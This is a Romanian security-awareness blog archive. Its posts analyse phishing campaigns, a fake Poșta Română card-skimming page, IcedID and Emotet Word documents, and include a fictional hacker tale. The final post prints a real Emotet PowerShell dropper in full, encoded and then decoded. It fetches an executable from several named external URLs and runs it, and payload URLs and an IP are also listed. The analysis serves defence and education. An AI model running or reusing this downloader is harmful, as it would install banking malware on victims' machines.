Arhiva tag-ul pentru: analiza

Atacul de tip phishing a devenit o armă foarte folosită de hackeri, sau/și chiar de personane care nu au cunoștințe destul de avansate în acest domeniu.

Pregătirea unui atac nu este dificilă!
Atacatorul își alege zona: social media, bancară… sau poate avea o țintă stabilită( Instituție/ Societate).
– Pagina falsă poate fi generată manual sau prin folosirea unor generatoare automate.
– Cumpără o adresă as3manat0are.abc cu cea pe care vrea să o falsifice.
– Trimite mesaje la adrese din grupul țintă sau folosește o listă cu adrese de email găsită/ cumpărată.
– Adună informațiile trimise de către victimele sale.

Vom menține acest studiu în zona bancară, după cum se poate vedea și în imaginea articolului, analizând detaliile atacului și scenariile posibile.

Atacatorul a cerut informații, iar victima a oferit totul!
Pagina de phishing a afișat o serie de formulare ce trebuiesc completate de victimă.

Adresa de email este normal să fie cerută, dar nu există logică în a cere/ oferi parola acelei adrese de email. Banca are nevoie de adresa de email pentru a trimite informații, alerte, documente, fară a fi necesară accesarea acesteia de către bancă, deoarece contul de email trebuie accesat DOAR de deținător.
Ce poate face cu aceste date atacatorul: accesare mesagerie, folosirea adresei pentru alte activități ilegale, încercarea de accesare a altor platforme folosind aceleași date… toate acestea ducând spre multe alte scenarii.
Adresa IP este foarte importantă! Poate afla informații despre infrastructura existentă la acest IP, DAR poate ajuta la tranzacțiile bancare ilegale(voi explica mai jos).
Browser folosit (Crome, Firefox, Edge..etc)…ajută atacatorul la imitarea accesului sau ca informație în cazul unui alt scenariu de înșelăciune.
Data/Ora pot fi folosite în caz de scenariu în formă continuă, ajutănd la convingerea victimei de autenticitatea celui din spatele unei conversații. (”Bună ziua sunt X de la bancă. Am vazut că la data/ora a fost accesat sistemul de verificare și aș mai dori câteva infrmații referitoare la…”)

Imaginea de mai sus se regăsește în explicațiile anterioare. Nume/ prenume, data nașterii, adresă, regiune, cod poștal, număr telefon, număr identificare socială.
Toate acestea pot fi folosite pentru continuarea unui atac, dacă hackerul consideră că victima îi poate aduce anumite beneficii, DAR în egală măsură, pot fi folosite pentru inducerea în eroare a unui funcționar bancar, a unui funcționar public, pentru obținerea unor beneficii ilicite.
Tot aceste informații pot fi folosite pentru a vă fura numărul de telefon, metoda fiind deja cunoscută (SIM Swapping), iar scenariul ei se bazează pe inducerea în eroare a unui angajat al companiei de telefonie, care poate muta numărul pe o altă cartelă de telefon.

Informații Card Bancar
Număr card bancar, Dată de expirare, CVV(numărul de 3 cifre de pe spate), Pin ATM, Numele mamei. Datele sunt cele cerute la tranzacțiile online.
Atacatorul are mai multe variante de câștig.
Vânzarea datelor bancare este foarte întâlnită. Atacatorul adunând un număr impresionant de date, preferă să le vândă, pentru a nu interacționa direct cu extragerea de fonduri.
Tranzacții online. În funcție de bancă, există anumite limite la tranzacțiile online, dar cel ce le deține are opțiuni de folosire a cardului. Poate achiziționa bunuri și servicii, poate face depuneri pe anumite platforme de jocuri, ”donații”…
La folosirea datelor are un avantaj în imitarea deținătorului folosind ceea ce discutam anterior… adresa de IP (folosind una cat mai apropiată de cea reală) și setarea browserului încât să fie identic cu cel din datele obținute.

Sistem bancar, platforme de socializare, funcționari… peste tot există sisteme de securitate avansate, politici și proceduri de funcționare, specialiști… dar atunci când actorul (atacatorul) joacă rolul persoanei(victimei) atât de bine, șansele de reușită sunt mai mari pentru acesta.

Noi suntem cei care putem înclina balanța! Prin educație putem să ne schimbăm statutul de posibile victime în simpli utilizatori și să ne continuăm activitățile zilnice.
Nu trebuie să ajungem victime pentru a începe să conștietizăm existența pericolului. Un pericol real. O ”simplă” întâmplare care ne poate schimba viața!


Educație
Conștientizare
Implicare

Miercuri, 14 octombrie 2020, la 6 zile după prezentarea susținută de CERT RO împreună cu grupul Cyber Volunteers 19 despre securitatea cibernetică a spitalelor din România, am primit pe adresa de mail ([email protected]) un mesaj aparent inofensiv însă…alertele de securitate au explodat!

Semnele de întrebare au apărut în momentul în care am un text legat de o factura emisă în baza… unui contract inexistent.

S-a declanșat imediat procedura de Incident Response și am început investigația.

Haideți să ”vedem” factura”

La deschiderea fișierului putem observa un așa zis mesaj necesar pentru actualizarea sistemului de operare, unul ce ne informează că anumite aplicații au nevoie de update, menționând utilitarul Microsoft Word cu îndemnul de a acorda acces pentru editarea documentului.

Putem spune că pentru vizualizarea acestui document era necesar să facem destul de multe operațiuni, deși în mod normal …ar fi trebuit să se deschidă și … atât!

Avem de-a face cu un text scris la o scară foarte mică și total de neînțeles, dar dacă îl mărim putem vedea că este un text generat și…fără logică.

Înainte de a urma indicațiile expeditorului, vom încărca documentul pe platformele de detectare a fișierelor malware.

https://www.virustotal.com/gui/file/2a4501a9c916de2614ab790c698688048ac5c327c03fdb1910509f81f0f8b9ad/detection

După cum se poate observa, se raportează o detecție destul de mare (40/62) și prezența a 2 tag-uri: doc + executes-droped-file. La un raport atât de mare șansele de a fi un fișier infectat sunt ridicate, iar tag-urile probează ceva neobișnuit: Este un fișier .doc … dar …executabil (execută un fișier).

Am analizat puțin fluxul de operare al “facturii”

  1. Deschide winword.exe (Microsoft Office Word)
  2. La activare conținutului cerut se rulează un ”macro”
  3. Macro ce lansează un powershell
  4. Powershell ce se va contecta la mai multe site-uri pentru a descărca partea a 2-a a atacului
  1. Partea a 2-a. atacului fiind aceea care oferă control total atacatorului asupra stației de lucru.

Este clar că am primit un fișier malware, ce are ca scop infectarea dispozitivului nostru!

Totuși să încercăm identificarea dovezilor… prin alte metode… mai clasice!

Deschidem fișierul cu un tool de editat și putem observa că nu se pot distinge prea multe elemente. 

Din toate acestea, vom alege sa extragem partea secțiunea Powershell și Macro, incluse în fișier.

Ceea ce se vede mai sus este codare Base64 ce permite transmiterea de “caractere speciale” independente de protocolul de comunicare (în cazul de față http/https)

Decodarea șirului de caractere rezultă într-o serie de comenzi powershell ce urmează să permită conectarea la mai multe site-uri și să descarce partea a 2-a a atacului unde întâlnim un alt nume cu rezonanță din zilele noastre – Trickbot, malware-ul dejucat de curând de Microsoft.

Observam deja primele “Indicators Of Compromise” (IOS) cele 7 domenii care găzduiesc (în mod conștient sau nu) partea a 2-a a atacului.

Continuarea articolului pe CV19 Romania

România, fiind în plină dezvoltare tehnologică, se confruntă zilnic cu astfel de situații, unele controlabile, altele greu accesibile prin intermediul administratorilor de hosting, rețea, ISP etc.

Așa cum am menționat și în alte articole, o serie de dispozitive conectate la internet sunt exploatate de hackeri, făcând parte din sistemele lor de răspândire și control al virușilor.

Articolul de astăzi îl vom trece la categoria ”notă explicativă”, pentru ca fiecare să poată vizualiza complexitatea răspândirii unui astfel de virus!

Un simplu document Word ”dezlânțuie” o serie de activități ascunse în interiorul calculatorului, printre care și descărcarea de alte fișiere, în mod neautorizat. Acestea sunt activate și la rândul lor se conectează la o serie de IP-uri/Domenii pentru a stabili o legătură, destul de compleză, cu panoul de comandă al hackerului. Odată stabilită legătura, hackerul poate trimite diverse comenzi calculatorului… de la sustragerea de date, până la comenzi de atac asupra altor sisteme informatice.
Și toate acestea… în decursul a câtorva minute!

Ceea ce este prezentat în imaginea de mai sus, se poate raporta la 2 feluri de victime.

1. O victimă umană, un utilizator ce primește un email infectat.
Dacă are un minim de cunoștințe, totul se v-a termina acolo. Ignoră email-ul.. s-au îl raportează specialistului, în cazul în care pare ceva important… dar suspect!
Dacă descarcă atașamentul și îl deschide… cursul activităților se vede mai sus!

2. Un sistem compromis.
Poate fi: server, router, cameră supraveghere, frigider smart, condolă gaming, TV, pc, telefon, tabletă, sisteme de comunicare interioare, bec smart, încuietoare smart… etc etc
Mai pe scurt, poate fi orice dispozitiv ce este conectat la internet!

Rezolvarea acestor probleme este la fel de complexă și depinde de mulți factori, dar…. un minim de educație în domeniu, un sfat de la un specialist și o minte deschisă…. pot diminua impactul negativ asupra internauților și al sistemelor informatice!

În principiu am vrut să postez doar pozele, dar chiar îmi doresc să înțeleagă toată lumea, de aceea am adaugat și 2-3 fraze!

Așa că… ATENȚIE LA DETALII!!!

– Ultima ameninţare cibernetică se poate instala chiar în încărcătorul mobilului, prin intermediul unui malware.
– Cu ajutorul BadPower, un atacator poate modifica software-ul din încărcătoarele fast charge şi prin urmare şi tensiunea electrică.
– Recomandarea principală este să îţi păzeşti şi încărcătorul, nu doar mobilul, dar programul poate fi instalat şi de la distanţă, prin atacarea telefonului.
– Cel puţin 18 modele sunt vulnerabile la BadPower

Dacă aveai impresia că banalul obiect cu care îţi încarci bateria telefonului este inofensiv, iată că a apărut şi aici o vulnerabilitate de care trebuie să te fereşti. Încărcătoarele noi, de tip „fast charging”, care oferă o încărcare …..
Specialistul în securitate cibernetică, Alexandru Angheluş, îţi recomandă să te fereşti de staţiile publice de încărcare şi să ai grijă atunci când împrumuţi încărcătorul.
Continuarea pe Mediafax.ro

Pentru astăzi, avem un domain ce pare suspect: posta-romana-ro.info
Suspiciunea orcărui utilizator trebuie sa intervină atunci când adresa este asemănătoare cu ceva, în cazul de față Poșta Romana.
În cazul în care avem de făcut plăți… ar trebui să fim puțin mai atenți!

Ok. Am primit un email în care se specifică faptul că trebuie să plătim ceva către Poșta Română!

Hai să analizăm împreună email-ul primit!
1. Aștepți vreun colet? Dacă DA, mergi mai departe, dacă NU… nu are sens să apeși pe ceva..
2. dragă client – Nu există! Un email către un client ce există în baza de date începe cu … ex. Dragă Alexandru / Domnule Angheluș etc.
3. taxe vamale(28.80 LEI). Urmează instrucțiunile: – Aș putea spunne că arată suspicios; suma între paranteze și un sec ”Urmează instr…”
4. Istorie – A cui istorie?
5. PASUL 1 : PLATA CHELTUIE… ”NOULU ATENȚIV” – Ok! Pentru un email generat automat… arată chiar tragic!
6. PASUL 2 …. Nu există!
7. IMPORTATE: 1,60 € – a) Nu înțeleg ce este ”importat”, b) Plata era în LEI, ce treabă are euro în poveste?
8. Click aici – Dacă era ”Apasă aici” poate prindea mai bine!
9. Dacă scrisoarea recomandată – Care scrisoare?!? Până acum am discutat despre un pachet, 28.80 LEI și 1,60 €…. hmmm
10. țineți suma de 1,60 EUR pe casă în ziua conformitații – € s-a transformat în EUR, ”pe casă” este greu de ținut EUR, de ziua Indepentenței am auzit… dar de cea a Conformității încă nu!
11. Puteți atașa informații ….pentru a o pastra în cel mai apropiat birou – Care scrisoare? … De ce în cel mai apropiat birou și nu în altă parte?

OK… pare suspect!
Dar hai să ”Click aici”!

Să începem analizarea paginii la care ne-a direcționat link-ul din spatele ”Click aici”.
1. Adresa este posta-romana-ro.info – De ce .info și nu .ro?!? Pentru a fi siguri, hai să căutăm pe Google!

OK. Se pare că adresa oficiala este posta-romana.ro, deci acel .info este dovada că se încearcă o inducere în eroare!

2. ”/……./……/servicii-expeditori/carti-ziare-reviste/in-romania/imprimate-interne/b5136/”
Acestea sunt foldere ce duc la un sistem de plată? NU PREA!

3. Avem steagul Americii, ok! Am mai găsit cazuri în care pagini oficiale din Romania erau gazduite pe servere din afara tării, dar unul ca Poșta Româna să fie încă acolo… mai greu!

După cum se vede, pagina este găzduită pe server de America.
Dar am cautat și pe Whois informații despre domain: Creat la data de 03.08.2020!
Interesant! Deci ”Poșta Română” foloseste un domain proaspăt creat ….

4. În partea de jos apare adresa reala, deoarece a copiat codul sursă a paginii oficiale!

Facem o ”plată”?

La adăugarea cardului, se pare că are un script ce verifică valabilitatea combinației de cifre.
De asemenea se poate vedea că suma de 28.80 a devenit ”amount: 2880”!
Am apăsat ”Pay online” și în trafic ne apare ca datele noastre au fost POSTate prin intermediul fisierului cc.php.
…dar iată și un email care nu este al nostru..
..oare acolo au plecat datele noastre?
Se pare că ne cere și parola primită prin SMS pentru confirmarea plații.
Această parolă este trimisă de către bancă, pentru a confirma ca plata este făcută de deținătorul cardului.
Apariția confirmării pe aceiași pagină, denotă că nu se face vreo plată. La plăți reale, clientul este redirecționat către pagina băncii, confirmă tranzacția, după care este trimis la pagina inițială.
Indiferent de câte ori vei introduce un cod, pagina va arăta că mai ai 2 încercări!

Putem spune cu siguranță că este o pagină falsă, creată pentru a fura datele cardurilor de bancă!

În ceea ce privește adresa de email găsită, are legătură cu China… de aceea și greșelile în scriere!

Poate că la prima vedere pare mult, dar atunci când este vorba despre plăți sau date personale, nu strică să fim puțin mai atenți la aceste detalii!!!

Eu sunt… să zicem H4ker!
Astăzi vom vorbi despre mine ca hacker activ pe internet, dar și despre ce am pățit de curând.
Fac mai multe prostii pe net, dar astăzi vă voi povesti despre faptul că de ceva timp trimit email-uri de tip phishing către instituții din Romania, Grecia și Bulgaria.
Motivul meu este clar. Vreau să obțin cât mai multe date personale de logare de la victimele mele!!

Nu mă poate prinde nimeni, pentru că folosesc VPN și IP-ul meu este ascuns!!!

Am găsit un browser stealer, adică o aplicație ce fură datele din browserele victimelor, gen Firefox, Chrome, Opera etc.
Nu am bani să il criptez, dar pică lumea chiar dacă Antivirusul anunță problema. Am un ftp furat tot de la victime și ma folosesc de el pentru colectarea datelor.
Metoda este simplă, cunoscută, dar merge foarte bine din cauza lipsei de educație cibernetică, mai ales la instituțiile publice unde sunt multe persoane… ce nu dau atenție la detalii..

Zilnic am câte 5-10 victime și sunt mulțumit de rezultate, așteptând să prind ceva bun!

Dar ideea este că nu am știut ce poate face un specialist in securitate cibernetică, sau cei care se ocupă in general de fișierele virusate!!

Eu am ascuns virusul intr-un fișier .iso pe care dacă il deschizi activează toată activitatea fără ca victima să înțeleagă ceva. Neștiind că cineva poate extrage acel virus și îl poate analiza.

După cum se vede și în imaginea de mai sus, analistul care s-a ocupat de virusul meu a reușit să gasească datele mele de logare către locația unde vin cele furate de la victime.
Nu știam că se poate așa ceva. Acolo se vede și virusul meu, în varianta finală care ajungea în calculatoarele victimelor.
Așadar analistul putea avea acces la datele furate de mine și cine știe la ce altceva, dar asta este partea ok.

La un moment dat am văzut că imi dispar furăciunile, dar apar niște fișiere noi…

Im waiting este pus de mine, așa la smecherie… că aștept victimele să îmi trimită datele lor!
Dar a venit și fișierul cu .iso, credeam că este o eroare a fișierului trimis de mine, deși nu avea cum să vină pe server, dar până la urmă l-am deschis ca să rezolv eroarea virusului.
Până la urmă mi-am dat seama că nu mergea deschis și l-am șters! Prostie de eroare…
La vreo 2 minute victime noi, deschid să văd ce am furat și… ce naiba?!? Datele mele pe unul din fișiere?!?
Atunci am înțeles că fișierul .iso era chiar virusul meu, pe care l-am deschis și mi-am furat datele.
Întârzierea de cîteva minute este logică, deoarece virusul meu actionează dupa 2 minute de la deschidere ;)


Atunci m-a lovit o idee destul de dureroasă! Cum de a venit virusul pe server și dacă analistul este și el pe server și mi-a luat datele???
Asta chiar ar fi de rău!!!

La ceva timp și dupa alte câteva victime, apar victime noi si incă un fișier .iso, clar că nu pun botul de două ori la aceiași capcană!!! Hellooo

Alea cu PW le știu.. client mai vechi.
Management_CERT sună interesant, dar tot ce era acolo cred că erau date false, că nu mergea nimic deși păreau conturi de servere(am înțeles mai târziu că era pus să mă țină logat pe ftp).
Cloud_user_admin…. ăsta e genul de victime asteptate. Cont de Root/Admin pe el, dacă merge m-am scos!

Foatre tare, nu?
Ei bine am intrat pe link și mă ducea pe o pagină neterminată… deci nimic interesant…
Totuși intru pe whiteclouddrive. com să văd ce este și … NUUUUUUUUUU!!!!!!!!
Domeniu folosit de analiști ca și capcană pentru acesări neautorizate…. adica… pfff
Tocmai am realizat că analistul are datele mele!!! Luate de 2 ori… cred că a doua capcană a fost pentru confirmare…
Oare… ?? Pffff
Ce se aude afară? E cineva la usă? …………

Articolul este doar o poveste și trebuie tratată corespunzător!
Cei ce se pricep la astfel de activități pot renunța la varianta ”CTRL I” ! :)

Atenție la detalii!!!

Așa cum am menționat și in articolele precedente, a deține o pagină web aduce de la sine o responsabilitate.
Timpurile paginilor ce erau …sparte și hackerul înlocuia index-ul pentru a se mândri cu isprava sa… au cam trecut.

O pagina vulnerabilă înseamnă încă un magazin deschis pentru hackeri. Vor folosi pagina pentru a raspândi fișiere infectate, redirecționări spre alte pagini, stocare de fișiere malware/ date și astfel deținătorul de pagină devine un susținător al activităților ilegale, fără a cunoaște acest lucru.

În urma cautărilor zilnice (activitate standard a celor din domeniul securității cibernetice..), echipa a descoperit legături intre virusul bancar și domeniile din Romania.
Drept urmare, in continuare vom detalia puțin informațiile gasite și speră să fie înțeleasă gravitatea situației.

Vom face o analiză simplă, fără a fi nevoie de cunoștințe aprofundate în analiză malware.

ICEID (BOKBOT)
Virus bancar descoperit de analiști prin Septembrie 2017.
Este răspândit catre victime cu ajutorul paginilor web prin injectarea alterarea acestora, sau prin intermediul mesajelor trimise prin email, cărora le sunt atașate anumite fișiere capcană.

În cazul de fața virusul a fost plasat către victime prin email.
De înțeles faptul că emailul poate conține texte prin care atacatorul manipulează victima, invocând diverse scenarii, încât acesta să descarce documentul din atașament.
Acest document poate avea diverse denumiri, în funcție de ținta atacatorului. În unele cazuri, când ținta este foarte clară, acesta va folosi exact ce ar avea credibilitate pentru victimă.

Exemple:
Pentru firme: Factura, Instiintare, Avertisment, Cerere, Raspuns la cerere, Ordin de plata etc;
Pentru persoane: Factura, Cupon, Reducere, Avertizare etc.
Scopul este foarte clar: Convingerea petențialei victime să descarce și să deschidă documentul atașat!

Emailul în cauză are un document atașat și îl vom denumi Factura.doc.
La deschiderea documentului textul era ascuns sub pretextul că nu este activă o anumită funcție și se cere activarea ei.
* Nu este nevoie să îl deschideți, vreau doar să vedeți cum arată!

Ok. Punem documentul pe VirusTotal.com, să vedem ce informații poate să ne ofere.


Ok, hai să vedem ce informații avem despre acest document și ce putem găsi noi! Link VirusTotal
Detecție 37/63. Adica, 37 din cele 63 de soluții antivirus ne spun că este un virus!
Toate acele cuvinte cheie vă vor arata da explicații despre document folosind Google search: docx, email-pattern, enum-windows, exe-pattern, handle-file, obfuscated, open-file, run-dll, url-pattern, write-file.
Pentru a ușura căutările vă ajut cu cele ce atrag atenția:
macros (functie de automatizare a documentului sau un șir de comenzi vizibile sau invizibile) – interesant nu?
obfuscated (metodă de ascundere a unui funcții, cod sursă, comenzi…)
url-pattern (ce este url-ul? o adresă http(s): ….., deci posibil să existe un url în document)
Încercați Google search pentru a găsi informații!

Încă nu sunteți convinși de existența virusului și documentul este foarte … important?!?
OK!
Mergem la pagina detalii: Detalii VirusTotal

În aceasă pagină gasim multe informații despre documentul scanat!

Hmmm… din limbile declarate sau găsite, cam ne dăm seama de unde provine documentul…
Aplicația clară Microsoft Word,
Ținta de bază este un script… unde apare și o pagină web românească
Documentul a fost creat: 27.02.2020
Și Название = Nume… :)

Mergem mai departe…
Relațiile/ conectările documentului cu alte surse: Link

A fost scanat pe VirusTotal in data de 07.03.2020, detectie 5/72 și era in legătură directă cu pagina românească.
Restul sunt scanări ale documentului, având ca sursă alte pagini web.

Comportamentul documentului în calculator, la activare.

Detaliile continuă și puteți vedea comportamentul documentului.
Aici se clarifică și relația dintre virus și pagina românească.
Pagina este folosită pentru ca documentul să descarce virusul de pe adresa sa.
Hackerul a încărcat virusul: /wp-content/uploads/2020/02/0303/ginndoe.jp

Avem și comenzile executateZXTRTU.exe

Aici lucrurile sunt deja clare:
– Documentul este deschis cu Microsoft Word, este activată acea funcție de editare/ vizualizare a conținutului.
-Se executa comanda de descărcare a documentului ginndoe.jp de pe pagina web.
-Documentul ginndoe.jp aruncă virusul în C cu denumirea ZXTRTU.exe( vezi foto 2 unde apare execuția)
Powershell-ul cere o pauza de 4 secunde (powershell -C Sleep -s 4) după care îi dă fișierului ZXTRTU.exe comanda de start (Saps C:\DiskDrive\1\Volume\BackFiles\ZXTRTU.exe)

Informații bune putem primi și de la comunitatea VirusTotal! Link detalii

Da… chiar foarte utile!
Se pare că același virus are legătură și cu o altă pagină românească!
Acolo a fost încarcat fișier .doc, deci nu virusul așa cum am văzut pe celălalt domeniu .ro.

Hai să găsim ceva informații despre domeniile .ro găsite.

Ambele găzduite pe Romarg, domenii .ro, Ip-uri diferite
Cataclean Eroare 404 – Nu îl gasește,
Ventilatoar-aer – În construcție
Posibil ca deținătorii s[ fi fost anunțați și au luat măsuri imediat!

În concluzie, nu trebuie să fie cineva expert pentru a putea verifica un document suspect, un email venit „urgent”.
Așa cum am spus și în postări anterioare, mai ales pe Facebook: La tot ce vedeți, trebuie să puneți semnul întrebării!!!
Chiar este email de la un prienten?
Dece mi-a trimis șeful ordinul de plată prin email?
etc…

Informațiile prezentate au surse publice:
https://www.malware-traffic-analysis.net/2020/03/03/index2.html
https://www.virustotal.com/gui/file/3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559/detection

Ca și bonus o să postez și scanarea botnet-ului: ZXTRTU.exe

Relația cu aceste domenii poate fi de trimitere/ descărcare date.

Atenție la detalii!!!

Hai să începem cu informațiile de bază!

Emotet este un virus din categoria Trojan sau mai degrabă un downloader, care are nevoie de acceptul victimei pentru a își începe activitatea în noua gazdă.
Este cheia care deschide ușa pentru adevăratul virus, care are ca scop extragerea de date personale, pentru ca hackerul să poată utiliza contul sau cardul victimei în scopuri personale.

Dacă la începuturi era trimis prin email ca executabil, sau atasat(backdoor) anumitor programe „gratuite”, acum trimiterea lui se face prin intermediul unor documente care sunt trimise prin email, îar aceste documente conțin o comandă de descărcare și o adresă web, iar virusul este descărcat de acolo și actionează în noua gazda(pc, mobilr etc).
Aceasta metodă este folosită pentru a păcăli atât protecția serviciilor de email, cât și viitoarea victimă.

La intrarea virusului cu acceptul victimei, șansele de scapare se bazează doar în posibilitatea de recunoaștere a virusului respectiv de catre antivirus, firewall… în funcție de ce are victima în dispozitiv.

Dar sa trecem la povestea noastră și o sa facem o mică analiză malware.
Zilnic apar liste cu Ip-uri, domenii, dispozitive compromise. Una dintre aceste liste conține două domenii de România.
Se presupune că sunt controlate de hackeri și folosite pentru a își gazdui fisierele lor malware.

Accesam adresele si vedem ca ambele contin fisiere .doc.
De precizat ca pana aici Antivirusul nu reactioneaza.

Dupa cum se poate observa, fisierele sunt descarcate de pe aceste domenii de Romania (.ro) si apar ca fiind documente Microsoft Word 97-2003.

La scanare, virusul apare detectat de numai 18 si cei 60 de vendori prezenti pe platforma. Drept urmare, o mare parte si solutiile antivirus NU vor reactiona la aparitia virusului in dispozitiv.
In aceata varianta, doar aplicatiile celor de mai sus pot identifica virusul.
Iata si motivul detectiei slabe, virusul a fost creat… astazi. Ceea ce denota ca hackerul vine cu variante „curate” pentru a evita detectia.
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tGQWzXxxxhSt
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tBUxxxQWaf5EyJ8

Acum, pentru a avea o idee despre ce se intampla…
Comanda documentului arata cam asa: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE” /n „C:\Users\admin\AppData\Local\Temp\2050519442433378869714090.doc

Comanda folosita de Powershell este ascunsa si criptata:

Powershell -w hidden -en JABNAGEAdABlAGQAdgB0AG4AZAA9ACcASABpAGoAcgBsAGsAbABjAG4AYgAnADsAJABYAGcAbQB4AGkAagBsAHEAaQBjAGsAbABpACAAPQAgACcAMQAzADkAJwA7ACQATABhAHkAcABvAHQAdwBrAG4APQAnAFMAcwBrAGYAYwBkAHMAaQBrAHcAYwBjACcAOwAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABnAG0AeABpAGoAbABxAGkAYwBrAGwAaQArACcALgBlAHgAZQAnADsAJABSAGEAegBnAGcAZQBpAHAAcABzAGMAPQAnAFkAawBxAGIAdAB4AHAAegAnADsAJABTAG4AeQBsAGUAdAB6AGsAZgBqAGYAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAQgBDAEwAaQBFAG4AVAA7ACQARwBhAHAAawBzAGUAaQB2AGUAbwA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAYQBuAGcAdgBhAG4AZwAuAGkAbgBmAG8ALgB2AG4ALwBoAG8AbQBlAC8AcABvAEkAYwA3AGwALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGYAbAB5AGIAdQB5AHMALgBuAGUAdAAvAGwAaQBiAHIAYQByAGkAZQBzAC8AeABlAHMALwAqAGgAdAB0AHAAOgAvAC8AaQBuAGYAbwByAG0AYQB0AGkAYwAtAGMAbAB1AGIALgBjAG8AbQAvAGwAYQBuAGcAdQBhAGcAZQAvAHkALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHMAdABpAGMAawB5AHAAbwBzAHQALgBpAG8ALwB3AHAALQBhAGQAbQBpAG4ALwBnAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHIAaQB2AGUAcgB0AHIAYQBpAG4AZQByAHMAYwBoAG8AbwBsAC4AYwBvAG0ALgBhAHUALwBsAG8AZwBzAC8AUgBZAEoAUABnAHIASwBPAEoALwAnAC4AIgBzAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAegBqAGkAdQBhAGgAagB5AHIAeQB4AHQAPQAnAEgAZwBrAGMAZABzAGQAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB4AHoAdABhAGwAaABwAGkAbgB2ACAAaQBuACAAJABHAGEAcABrAHMAZQBpAHYAZQBvACkAewB0AHIAeQB7ACQAUwBuAHkAbABlAHQAegBrAGYAagBmAG4ALgAiAGQAYABvAHcATgBMAGAATwBhAEQARgBgAGkAbABFACIAKAAkAEsAeAB6AHQAYQBsAGgAcABpAG4AdgAsACAAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQAWQB0AHYAagBlAHIAcwB5AGEAdABoAHcAPQAnAE8AaABqAGQAZwBmAGIAcgB0AHgAbAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAApAC4AIgBsAGAAZQBuAGcAdABIACIAIAAtAGcAZQAgADMAMgA2ADgAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAFIAVAAiACgAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQATwBoAGQAdQBqAHAAdwBoAG0AegB0AGEAZwA9ACcARAB3AGwAawB3AG4AdwBqAHoAeQB1AHMAJwA7AGIAcgBlAGEAawA7ACQAWAB4AG8AbAB2AGsAdABxAD0AJwBIAHEAaAB1AGoAagBnAHoAZAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAZgBpAGkAcwB4AGQAdgA9ACcAUQBnAHAAYwBmAG8AbABvAHkAbgBrAHoAZAAnAA==

Decryptata din Base64

$�M�a�t�e�d�v�t�n�d�=�’�H�i�j�r�l�k�l�c�n�b�’�;�$�X�g�m�x�i�j�l�q�i�c�k�l�i� �=� �’�1�3�9�’�;�$�L�a�y�p�o�t�w�k�n�=�’�S�s�k�f�c�d�s�i�k�w�c�c�’�;�$�Y�q�e�i�s�h�r�f�t�m�p�=�$�e�n�v�:�u�s�e�r�p�r�o�f�i�l�e�+�’�\�’�+�$�X�g�m�x�i�j�l�q�i�c�k�l�i�+�’�.�e�x�e�’�;�$�R�a�z�g�g�e�i�p�p�s�c�=�’�Y�k�q�b�t�x�p�z�’�;�$�S�n�y�l�e�t�z�k�f�j�f�n�=�&�(�’�n�e�’�+�’�w�-�o�’�+�’�b�’�+�’�j�e�c�t�’�)� �n�e�T�.�w�E�B�C�L�i�E�n�T�;�$�G�a�p�k�s�e�i�v�e�o�=�’�h�t�t�p�:�/�/�t�r�a�n�g�v�a�n�g�.�i�n�f�o�.�v�n�/�h�o�m�e�/�p�o�I�c�7�l�/��h�t�t�p�s�:�/�/�w�w�w�.�f�l�y�b�u�y�s�.�n�e�t�/�l�i�b�r�a�r�i�e�s�/�x�e�s�/��h�t�t�p�:�/�/�i�n�f�o�r�m�a�t�i�c�-�c�l�u�b�.�c�o�m�/�l�a�n�g�u�a�g�e�/�y�/��h�t�t�p�:�/�/�d�e�m�o�.�s�t�i�c�k�y�p�o�s�t�.�i�o�/�w�p�-�a�d�m�i�n�/�g�/��h�t�t�p�s�:�/�/�w�w�w�.�d�r�i�v�e�r�t�r�a�i�n�e�r�s�c�h�o�o�l�.�c�o�m�.�a�u�/�l�o�g�s�/�R�Y�J�P�g�r�K�O�J�/�’�.�”�s��p�l�I�T�"�(�[�c�h�a�r�]�4�2�)�;�$�G�z�j�i�u�a�h�j�y�r�y�x�t�=�'�H�g�k�c�d�s�d�f�'�;�f�o�r�e�a�c�h�(�$�K�x�z�t�a�l�h�p�i�n�v� �i�n� �$�G�a�p�k�s�e�i�v�e�o�)�{�t�r�y�{�$�S�n�y�l�e�t�z�k�f�j�f�n�.�"�d��o�w�N�L��O�a�D�F��i�l�E�”�(�$�K�x�z�t�a�l�h�p�i�n�v�,� �$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�Y�t�v�j�e�r�s�y�a�t�h�w�=�’�O�h�j�d�g�f�b�r�t�x�l�’�;�I�f� �(�(�.�(�’�G�e�t�-�’�+�’�I�t�e�m�’�)� �$�Y�q�e�i�s�h�r�f�t�m�p�)�.�”�l��e�n�g�t�H�"� �-�g�e� �3�2�6�8�1�)� 